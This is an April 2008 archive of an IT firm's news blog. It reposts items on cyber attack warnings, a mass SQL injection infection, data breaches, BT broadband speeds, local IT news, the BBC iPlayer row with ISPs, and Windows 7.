Archive for April, 2008

Hackers warn high street chains

High street chains will be the next victims of cyber terrorism, some of the world’s elite hackers have warned.

They claim it is only a “matter of time” before the likes of Tesco and Marks & Spencer are targeted.

Criminals could use the kind of tactics which crippled Estonia’s government and some firms last year, they warned.

The experts were members of the infamous “Hackers Panel” which convened in London this week at the InfoSecurity Europe conference.

The panel includes penetration testers and so-called “white hat” hackers, who help companies tighten up their digital security by searching for flaws in their defences.

Previous panellists include Gary McKinnon, known as Solo, alleged by the US government to have hacked into dozens of US Army, Navy, Air Force, and Department of Defense computers.

The “hackers” usually remain anonymous, “for security reasons”, but this year’s panellists agreed to break cover.

Common cause

First up was Roberto Preatoni, the founder of the cyber crime monitoring site, Zone-H, and WabSabiLabi, a trading site for security researchers.

His appearance came just a few months after he was arrested by Italian authorities on charges of hacking and wiretapping, as part of the ongoing investigation into the Telecom Italia scandal.

Mr Preatoni told the audience that the attacks in Estonia were a harbinger for a new era of cyber warfare.

“I’m afraid we will have to get used to this,” said Mr Preatoni, also known as SyS64738. “We had all been waiting for this kind of attack to happen.

“Estonia was just unfortunate to be the first country to experience it. But very soon, our own [western] companies and countries will be getting attacked for political and religious reasons.

“This kind of attack can happen at any time. And it will happen.”

During the two week “cyber war” against Estonia, hackers shut down the websites of banks, governments and political parties using “denial-of-service” (DoS) attacks, which knock websites offline by swamping servers with page requests.

As many of the attacks originated from Russia, the Estonian government pointed the finger at the Kremlin. But Mr Preatoni said that, having spoken to contacts in the hacking community, he was clear that “Putin was not involved”.

“In my opinion, this was a collection of private individuals who spontaneously gathered under the same flag.

“Even though Estonia is one of the world’s most advanced countries in IT technology, the whole economy was brought to its knees.

“That’s the beauty of asymmetric warfare. You don’t need a lot of money, or an army of people. You can do it from the comfort of your living room, with a beer in your hand.

His warning was echoed by Steve Armstrong, who teaches seminars in hacking techniques, at the SANS Institute for information security training.

“If someone wants to have a pop at the UK, they are unlikely to go for the government web servers. They will go for the lower hanging fruit – companies which are seen as good representatives of the country.

“The likes of Tesco, Marks & Spencer and B&Q can be seen as legitimate targets.

“We have to get the message across to companies [to invest in information security].

“At the moment Chief Executives are only interested in the bottom line. But remember – if tesco.com goes down, that’s a lot of shopping.”

Mr Preatoni said that the Estonian government’s repeated failure to thwart the attacks was proof that we still have “no good solutions” for denial of service attacks.

The panellists then argued over whether Internet Service Providers should do more to tighten security, by helping customers’ protect their computers from being “zombified” by hackers for use in distributed DoS attacks.

“Actually, I don’t think the ISPs should have any role in security,” said Preatoni.

“In my opinion, that’s like asking the Royal Mail to be responsible for the quality of your post.”

But his view was immediately challenged by the third panellist, Jason Creasey, head of research at the independent Information Security Forum.

“I believe ISPs can play a phenomenal role in security, with a little bit of legal pressure,” he claimed.

Net weakness

He was backed by an audience member, Angus Pinkerton, of Lynks Security Consulting. “The only way to defend against a distributed attack is with a distributed defence,” he argued.

“I think it’s unacceptable that ISPs are content to let their customers be part of bot-nets.”

He challenged Steve Armstrong’s view that asking ISPs to perform security duties was “fundamentally, censorship.”

“This is not about free speech,” said Mr Pinkerton. “Free speech does not entitle you to shout fire in a crowded theatre.”

In the meantime, Mr Preatoni warned the audience it is “only going to get easier” to carry out a DoS attack, because he claimed the latest net address system, known as Internet Protocol Version 6 (IPv6), is actually more amenable to DoS.

Later, he told the BBC that the rise in cyber attacks originating in China was a convenient cloak for western countries to disguise their own cyber espionage activities.

“It’s too easy to blame China,” he said. “In fact, legitimate countries are bouncing their attacks through China. It’s very easy to do, so why not?

“My evil opinion is that some western governments are already doing this.”


Hackers infect half a million websites

UK Government websites are among half a million pages infected by hackers in a huge and well organised SQL injection attack.

SQL injection involves inserting malicious code into websites by entering SQL queries into input boxes, such as search or comment fields. Infected websites can then infect any users visiting the site.

“As more and more websites are using database back-ends to make them faster and more dynamic, it also means that it’s crucial to verify what information gets stored in or requested from those databases – especially if you allow users to upload content themselves,” warns a blog post from F-Secure. “Unless that data is sanitised before it gets saved you can’t control what the website will show to the users.”

The company searched Google for a string indicating that a site has been infected, and found that 510,000 sites were affected. Among those were UN sites and the UK Civil Service careers site.

The code inserts a link to all text fields in a database that adds malicious javascript to the source code of the page. Three domains have been found to host the code; nmidahena.com, aspder.com and nihaorr1.com.

F-Secure suggests that site owners search their site for links to the javascript, and remove them before any users are infected. Sanitising any data sent to the database by users will prevent similar attacks in the future.

Source – PC Pro


Brymau Estates make the Smart choice

Brymau Estates Ltd, a local multi tenant workspace provider have chosen Smart Info Tech Ltd as their preferred IT services provider.

Speaking yesterday MD Barry Weaver spoke of his delight to be working with Brymau Estates Ltd.
“Brymau Estates Ltd are one of Chester’s best known businesses and have a huge portfolio of quality office accommodation”.
“Redhill House in Saltney is one of their best known sites and has over 50 offices and workshops. That’s not to mention their other sites based at The Sidings, Riverside House, Penrhos Manor, Great Weston House and Mallard House!”
“We obviously can’t wait to get started and are looking forward to a long and mutually beneficial relationship”.

For more information on Brymau Estates Ltd visit – www.brymauestates.co.uk

For a list of locations click here

For details of conference and training click here

For meeting room information click here

For up to date availability of office space click here

For contact information click here


Customer data ‘needs protection’

Companies and public bodies are not doing enough to protect customers’ data, the UK’s privacy watchdog and a major survey of security have said.

The Information Commissioner said that the 94 security breaches reported to him last year was an “alarming” number.

The survey of more than 1,000 firms suggested that almost 90% of them let staff leave offices with potentially confidential data stored on USB sticks.

Firms and public bodies were urged to make data protection a priority.

Information Commissioner Richard Thomas said of the 94 data breaches, two thirds were committed by government or other public sector bodies.

Data had been recovered in only three of the 94 cases, he said.

The material included personal details of UK citizens, including health records.

“The evidence shows that more must be done to eradicate inexcusable security breaches,” he said.

Mr Thomas’ findings and the separate Information Security Breaches Survey will be detailed at the InfoSec show in London, the world’s largest event of its kind.

The survey was carried out by Price Waterhouse Coopers on behalf of the Department for Business Enterprise and Regulatory Reform.

According to the survey, almost 80% of firms that had reported a stolen computer had not encrypted data on the hard drive.

Chris Potter, from PricewaterhouseCoopers, which compiled the survey, told BBC News that overall attitudes to security had improved in the last 12 months.

System failures

“Companies have focused on the areas which have caused them most damage in the past, such as viruses and system failures.

“These tend to have caused the greatest cost in terms of business interruption.”

But he said the “biggest concern is around the protection of customer data, which companies clearly want to be good at.

“Sometimes that’s not translating into real action.”

He said particular threats were around the lack of encryption of data on laptops, the use of USB memory sticks and newer technologies like Voice over Internet Protocol.

“In all these areas the controls are not as strong as they are over traditional threats,” he said.

Mr Potter’s comments were echoed by those of the Information Commissioner.

Mr Thomas said: “The government, banks and other organisations need to regain the public’s trust by being far more careful with people’s personal information.

“Once again I urge business and public sector leaders to make data protection a priority in their organisation.”

Of the total reported to the commissioner, 62 security breaches were in the public sector, 28 were in the private sector and four in the charity or third sector.

Of those reported by public sector bodies, almost a third happened in central government and associated agencies, and a fifth in the NHS.

According to the PricewaterhouseCoopers report, fewer companies today are encrypting data on laptops than two years ago, despite a recent spate of high-profile instances of laptop losses with unencrypted information.

Mr Potter said: “We have seen in successive surveys that companies tend to be very good with preventing yesterday’s problems. Companies need to say on their toes to make sure they are addressing tomorrow’s problems.”

The report found that the number of attempts to hack into company networks had risen dramatically over the last two years.

“What is a really big concern is the proportion of large businesses that say hackers have got into their networks,” said Mr Potter.

Two years ago one percent of large businesses reported a hacker penetration compared to 13% in the current report.

The survey also said that figure was likely to be under-reported because many large firms did not admit to successful hacks on their networks.

Security breaches cost UK business roughly several billions pounds a year, said the report.


BT backtracks on 21CN broadband speeds

BT has backtracked on claims that half the country will receive speeds of 12Mb/sec or greater on its new 21CN network.

Whilst briefing journalists at its Gatwick headquarters last month, BT Wholesale’s managing director of products and strategy, Cameron Rejali, told us that “We think 50% of lines will have 12Mb/sec or better,” under 21CN.

But PC Pro subsequently discovered that just weeks before, BT Wholesale had told ISPs that its lab tests revealed 50% of households would only be expected to achieve speeds of at least 6.3-9.3Mb/sec. The figures were published on the BT Wholesale website, from a meeting held with ISPs on 13 February.

When PC Pro first asked BT why there was such a large discrepancy between what the company had told ISPs and what Rejali had told journalists, a spokesperson told us the data on the website was old.

However, BT has this week admitted to PC Pro that the figures are indeed the latest available data and has attempted to distance itself from Rejali’s earlier remarks.

“I can confirm that the figure which states that 50% of UK households can expect to achieve speeds of 6.3-9.3Mb/sec is the latest lab trial data,” a spokesperson told us. “However, it is very difficult to predict the actual speeds that customers will receive once WBC [BT Wholesale Broadband Connect] is rolled out on a nationwide scale.

“Testing and trialling continues and estimates of line rates and coverage may change. For example, customers that today take the DSL Max service (up to 8Mb/sec) are receiving higher line speeds than were predicted during the DSL Max trial, hence Cameron’s comments that 50% of UK households could well achieve higher speeds than the current lab trial data indicates.”

When we pressed the spokesperson on what figure BT thinks is now the most reliable indicator of what customers are likely to receive, she said “we should go with the 6.3-9.3Mb/sec figure”.

ISPs who have been working closely with BT on the 21CN trials have told PC Pro that they too don’t expect most customers to achieve anything close to the headline speeds. “Not many are going to get anywhere near 24Mb/sec,” James Blessing, chief operating officer of Entanet told us.

“If you’re getting above four meg [currently] you’ll see an increase. If you’re getting below four meg, some people actually get a slight decrease.”

Those views are echoed by Thinkbroadband.com, which has researched the speeds customers can expect using ADSL2+ on BT’s new network. “Those who go fast now are going to go even faster,” says site editor, Andrew Ferguson. “Those on 1-1.5Mb/sec are going to see perhaps half a meg extra.”

BT WHOLESALE’S 21CN SPEED ESTIMATES

% of UK households – Expected to achieve speeds of at least

(Max) 12.3-16.3Mb/sec
10% 12.1-16.2Mb/sec
25% 10.9-14.7Mb/sec
50% 6.3-9.3Mb/sec
75% 3.3-5.0Mb/sec

Source: PC PRO


Cheshire counciler banned from computer

A CITY councillor has had his access to the Chester City Council’s computer network temporarily denied after being accused of sending inappropriate emails.

Cllr Max Drury, 60, has already said sorry to Lib Dem group leader Paul Roberts (Farndon) and his wife as well as Cllr Gwyneth Cooper (Lab, City & St Anne’s), Cllr Paul Cheetham (Lib Dem, Vicars Cross) and “anyone” else offended.

City council spokesman Mike McGivern said: “Chester City Council has temporarily withdrawn its Information & Communications Technology (ICT) service from Councillor Max Drury. We are in discussions with him to reinstate his ICT connection as soon as is practical.

“Anyone wishing to contact Councillor Drury via the city council’s e-mail system should email: memberservices@chester.gov.uk.”

Cllr Drury (Curzon & Westminster) got embroiled in the saga after responding to a round-robin e-mail inviting members on a site visit to a colleague’s ward.

In an unrelated matter, Cllr Drury was arrested on March 2 on suspicion of breaching an harassment order.

Cllr Drury has not been selected by the Conservatives to stand for Overleigh – which covers the area he currently represents – but will be standing for City ward in elections for the new West Cheshire and Chester Council on May 1.

Cllr Drury was not available for comment.

Source – Mar 13 2008 by David Holmes, Chester and Cheshire Chronicle


Cheshire parents get chance to catch up

PARENTS are being given a chance to bridge the gap between their children’s and their own computer skills.

A new course at Whitchurch Junior School is making sure young technology whizzes can no longer put the older generation to shame!

Family learning tutor Sally Whelan of Shropshire County Council visits the school every week to work with a group of seven parents.

This is her third set of sessions at the school, following earlier maths and English courses – all called Keeping up with the children.

The aim is to enhance parents’ skills and give them an understanding of the school syllabus so they can better help their children with work at home.

Headteacher Matthew Copping said: “Parents can improve their own skills, see what we do in school, and see how IT can help develop other subjects.

“For the first time, we are giving children a chance to come out of lessons to join their parents for a short slot in the sessions.”

The next Keeping up with the Children course has yet to be confirmed, but Mr Copping hopes to run another English course.

Source – Cheshire Chronicle


HSBC joins disc data disaster crowd

HSBC has become the latest organisation to lose hundreds of thousands of customer details on an unencrypted disc.

The disc contains the names, dates of birth and insurance cover details of 370,000 people who hold life assurance policies at the bank.

The disc went missing after being sent by Royal Mail courier to the bank’s insurance partner, Swiss Re in February.

Such information is normally sent over a secure internet connection, but it wasn’t working on the day

Amazingly, given the furore surrounding Customs losing 25m personal records in near identical circumstances last November, nobody at HMRC though it wise to encrypt the contents of the disc, relying instead on flimsy password protection.

“The data disc lost by HSBC contains no address or bank account details for any customer and would therefore be of very limited, if any, use to criminals,” HSBC claims in a statement.

HSBC has informed the Financial Services Authority (FSA) of the loss and says it will contact the affected customers.

Last year the FSA fined Norwich Union 1.26 million for exposing its customers to the risk of fraud, when it lost a laptop containing sensitive data.

Source: Pc Pro


ISPs vs BBC row

Relationships between the BBC and internet industry have plunged to an all-time low, after the BBC’s internet chief Ashley Highfield used a blog post yesterday to tell ISPs to get stuffed – and even threatened to name and shame them.

The cost of carrying iPlayer traffic has been a sore point for ISPs, who must absorb steeply rising traffic costs. Regulator OFCOM’s Market Impact Assessment estimated the P2P version of iPlayer would create up to £831m in extra costs for the internet industry. In the first month of the “low bandwidth” iPlayer, ISPs saw streaming costs rise 20 per cent.

But Highfield, Director of Future Media and Technology at the £4bn-a-year corporation, said the BBC won’t help them out.

“I would not suggest that ISPs start to try and charge content providers,” he scolds.

“They are already charging their customers for broadband to receive any content they want. If ISPs start charging content providers, the customer will not know which content will work well over their chosen ISP, and what content may have been throttled for non-payment of a levy.”

Highfield instead advises them to pass the increased costs onto their customers in the form of tiers of service (ie price increases).

And if ISPs didn’t follow his “advice”, and dared to traffic shape their networks to manage their bandwidth hogs, Highfield threatened that the BBC would name and shame them.

“Content providers, if they find their content being specifically squeezed, shaped, or capped, could start to indicate on their sites which ISPs their content worked best on (and which to avoid). I hope it doesn’t come to this, as I think we (the BBC and the ISPs) are currently working better together than ever.”

Being put on the BBC’s List of Shame could have serious commercial repercussions for internet providers.

(Highfield also raised eyebrows with his assertion that “The best technical solution is usually Moore’s law”. An oddly ignorant thing to say, since the capacity and price of copper and fibre connections have very little to do with the density of transistors on a semiconductor die. Earth to Ashley: Ceci n’est pas une pipe.)

It’s a lose-lose situation for the ISPs. If they refuse to carry iPlayer material, they lose customers and go out of business. If they do carry iPlayer material, and traffic shape their networks, the BBC will shame them, and they go out of business. Who’d be an ISP?

Highfield’s heavy-handed intervention may undo much of the conciliatory work undertaken by iPlayer boss Anthony Rose. As we reported recently, the BBC is exploring building its own Content Delivery Network (CDN) to ease the delivery costs for ISPs.

One executive at a major ISP stormed back at Highfield:

“Relying on the customer’s failure to read the small print is not the basis for a digital content strategy.”

Source:The Register


Vista who?

Windows 7 could be arriving much sooner than anticipated, according to none other than Bill Gates.

When asked about the progress of Windows Vista during a speech at the Inter-American Development Bank, Gates told the audience: “Sometime in the next year or so we will have a new version,” according to a report on CNet.com.

It’s not clear whether Gates was referring to the full commercial launch of the new operating system or merely a beta version, but either way it seems the development of Windows 7 is progressing rapidly. Last month it was revealed that Microsoft had sent a test version of Windows 7 to the US government, indicating that the operating system is already in a working state.Microsoft has previously stated that Windows 7 would launch three years after the 2007 release of Vista.

And Gates gave further encouragement to those who are hoping for an upturn in fortunes, after the muted response to Windows Vista. “I’m super-enthused about what it will do in lots of ways,” he said of Windows 7.

Microsoft has remained tight-lipped on what features can be expected from the next version of Windows, leading some to speculate that the company is attempting to follow Apple’s practice of divulging little about new operating systems until launch.

A Wishlist of potential Windows 7 features was leaked last November, although Microsoft refused to confirm or deny that any of the 61 features would make it into the final code.

Source – PC Pro